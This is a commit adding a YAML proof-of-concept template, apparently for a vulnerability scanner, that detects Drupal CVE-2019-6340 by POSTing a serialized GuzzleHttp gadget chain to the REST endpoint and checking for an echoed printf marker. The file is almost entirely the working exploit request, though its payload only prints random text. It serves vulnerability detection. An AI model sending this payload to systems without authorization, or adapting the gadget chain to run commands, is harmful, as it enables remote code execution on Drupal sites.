Create poc-yaml-cve-2019-6340.yml (#485)

chaitin · Oct 25, 2019 · 6fb578d · 6fb578d
1 parent d7926da
commit 6fb578d
Showing 1 changed file with 33 additions and 0 deletions.
diff --git a/pocs/poc-yaml-drupal-cve-2019-6340.yml b/pocs/poc-yaml-drupal-cve-2019-6340.yml
@@ -0,0 +1,33 @@
+name: poc-yaml-drupal-cve-2019-6340
+set:
+  host: parseURL(url)['host']
+  r1: randomLowercase(4)
+  r2: randomLowercase(4)
+rules:
+  - method: POST
+    path: /node/?_format=hal_json
+    headers:
+      Content-Type: application/hal+json
+      Accept: '*/*'
+    body: |
+      {
+        "link": [
+          {
+            "value": "link",
+            "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:10:\"{{r1}}%%{{r2}}\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"printf\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
+          }
+        ],
+        "_links": {
+          "type": {
+            "href": "http://{{host}}/rest/type/shortcut/default"
+          }
+        }
+      }
+    follow_redirects: true
+    expression: |
+      status==403&&body.bcontains(bytes(r1 + "%" + r2))
+detail:
+  author: thatqier
+  links:
+    - https://github.com/jas502n/CVE-2019-6340
+    - https://github.com/knqyf263/CVE-2019-6340